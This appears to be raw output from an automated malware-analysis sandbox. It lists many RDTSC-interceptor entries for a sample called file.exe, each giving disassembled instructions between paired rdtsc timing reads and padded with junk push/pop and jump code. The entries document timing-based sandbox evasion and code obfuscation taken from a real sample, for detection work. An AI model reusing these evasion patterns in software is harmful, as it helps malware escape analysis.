                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111086 second address: 111108F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111108F second address: 111109F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215D82 second address: 1215D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB6CC860F26h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215D90 second address: 1215D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB1D second address: 122EB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB23 second address: 122EB29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EC6A second address: 122EC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EC70 second address: 122EC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EC74 second address: 122EC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EC78 second address: 122EC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EC7E second address: 122EC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FB6CC860F26h 0x0000000d jnl 00007FB6CC860F26h 0x00000013 jne 00007FB6CC860F26h 0x00000019 popad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EC9B second address: 122ECA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ECA4 second address: 122ECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ECA8 second address: 122ECAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EFAF second address: 122EFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EFB3 second address: 122EFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EFBD second address: 122EFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12313AE second address: 12313B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12313B2 second address: 12313C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007FB6CC860F26h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233D83 second address: 1233D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233D87 second address: 1233D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12340DE second address: 12340E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123437F second address: 1234385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236E7E second address: 1236E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030312 second address: 5030338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030338 second address: 503034B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503034B second address: 5030363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F34h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030363 second address: 5030398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FB6CD925507h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FB6CD9254FBh 0x00000018 pop esi 0x00000019 movsx edx, cx 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020071 second address: 5020075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020075 second address: 5020079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020079 second address: 502007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060109 second address: 506010F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506010F second address: 5060113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060212 second address: 5060218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF00C8 second address: 4FF00E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF00E5 second address: 4FF010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 8860h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB6CD925506h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF010F second address: 4FF0115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0115 second address: 4FF0166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FB6CD925503h 0x00000012 push dword ptr [ebp+04h] 0x00000015 pushad 0x00000016 mov ax, AC9Bh 0x0000001a mov dx, ax 0x0000001d popad 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 mov ah, DEh 0x00000024 jmp 00007FB6CD925505h 0x00000029 popad 0x0000002a push dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0166 second address: 4FF0179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0179 second address: 4FF017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF017F second address: 4FF0183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF019D second address: 4FF01A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010D01 second address: 5010D20 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FB6CC860F2Ch 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, cx 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010D20 second address: 5010D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD9254FEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501075A second address: 50107E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB6CC860F34h 0x00000011 sbb cx, 4EA8h 0x00000016 jmp 00007FB6CC860F2Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB6CC860F38h 0x00000022 or si, 4108h 0x00000027 jmp 00007FB6CC860F2Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB6CC860F35h 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50107E1 second address: 501084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB6CD925503h 0x00000013 and ecx, 18BFAF5Eh 0x00000019 jmp 00007FB6CD925509h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FB6CD925500h 0x00000025 xor cl, 00000058h 0x00000028 jmp 00007FB6CD9254FBh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010612 second address: 5010618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010618 second address: 50106F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB6CD925502h 0x00000010 sub ecx, 77570478h 0x00000016 jmp 00007FB6CD9254FBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB6CD925508h 0x00000022 xor ax, 1ED8h 0x00000027 jmp 00007FB6CD9254FBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ebp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FB6CD925504h 0x00000038 xor cl, 00000038h 0x0000003b jmp 00007FB6CD9254FBh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FB6CD925508h 0x00000047 or ecx, 1CCA6398h 0x0000004d jmp 00007FB6CD9254FBh 0x00000052 popfd 0x00000053 popad 0x00000054 mov ebp, esp 0x00000056 jmp 00007FB6CD925506h 0x0000005b pop ebp 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FB6CD925507h 0x00000063 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50103DD second address: 50103E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50103E1 second address: 50103E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50103E7 second address: 501043A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 5Eh 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov bl, 8Eh 0x0000000e pushfd 0x0000000f jmp 00007FB6CC860F38h 0x00000014 adc esi, 5D17C338h 0x0000001a jmp 00007FB6CC860F2Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB6CC860F35h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502038D second address: 502039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD9254FEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502039F second address: 50203E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB6CC860F36h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB6CC860F37h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50203E2 second address: 50203E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060020 second address: 5060025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060025 second address: 5060077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, DEB1h 0x00000007 mov edx, eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB6CD925503h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FB6CD925506h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB6CD925507h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060077 second address: 50600A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 jmp 00007FB6CC860F30h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6CC860F37h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50600A9 second address: 50600AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030633 second address: 5030637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030637 second address: 503063D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503063D second address: 503064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F2Dh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503064E second address: 503068F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FB6CD9254FAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FB6CD925500h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB6CD925507h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503068F second address: 50306FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007FB6CC860F2Ch 0x00000012 pushfd 0x00000013 jmp 00007FB6CC860F32h 0x00000018 add esi, 07770908h 0x0000001e jmp 00007FB6CC860F2Bh 0x00000023 popfd 0x00000024 popad 0x00000025 and dword ptr [eax], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB6CC860F35h 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306FC second address: 503071B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503071B second address: 503071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503071F second address: 5030725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010563 second address: 50105A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB6CC860F31h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007FB6CC860F36h 0x0000001b pop esi 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030204 second address: 5030218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925500h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030218 second address: 503021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503021C second address: 503025A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007FB6CD9254FFh 0x00000014 add si, 080Eh 0x00000019 jmp 00007FB6CD925509h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503025A second address: 503028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov ebx, 6B0CA56Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FB6CC860F35h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d mov dl, EDh 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503028A second address: 5030290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030290 second address: 5030294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030294 second address: 5030298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304AE second address: 50304B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304B2 second address: 50304B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304B8 second address: 50304CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F31h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304CD second address: 50304D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304D1 second address: 503053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FB6CC860F2Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov al, D3h 0x00000014 pushfd 0x00000015 jmp 00007FB6CC860F33h 0x0000001a sub al, FFFFFFCEh 0x0000001d jmp 00007FB6CC860F39h 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FB6CC860F2Eh 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB6CC860F2Ah 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503053B second address: 503053F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503053F second address: 5030545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050626 second address: 5050637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD9254FDh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050637 second address: 5050656 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050656 second address: 505066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6CD9254FAh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505066C second address: 505067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F2Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505067E second address: 50506DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB6CD925502h 0x00000014 sub eax, 2D726FB8h 0x0000001a jmp 00007FB6CD9254FBh 0x0000001f popfd 0x00000020 movzx eax, di 0x00000023 popad 0x00000024 movsx ebx, ax 0x00000027 popad 0x00000028 mov eax, dword ptr [76FB65FCh] 0x0000002d pushad 0x0000002e mov cx, 0F39h 0x00000032 movzx esi, di 0x00000035 popad 0x00000036 test eax, eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FB6CD9254FCh 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50506DD second address: 505072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7852B1F4h 0x00000008 pushfd 0x00000009 jmp 00007FB6CC860F2Dh 0x0000000e sub eax, 1D632BB6h 0x00000014 jmp 00007FB6CC860F31h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007FB73E74417Eh 0x00000023 jmp 00007FB6CC860F2Eh 0x00000028 mov ecx, eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505072A second address: 5050730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
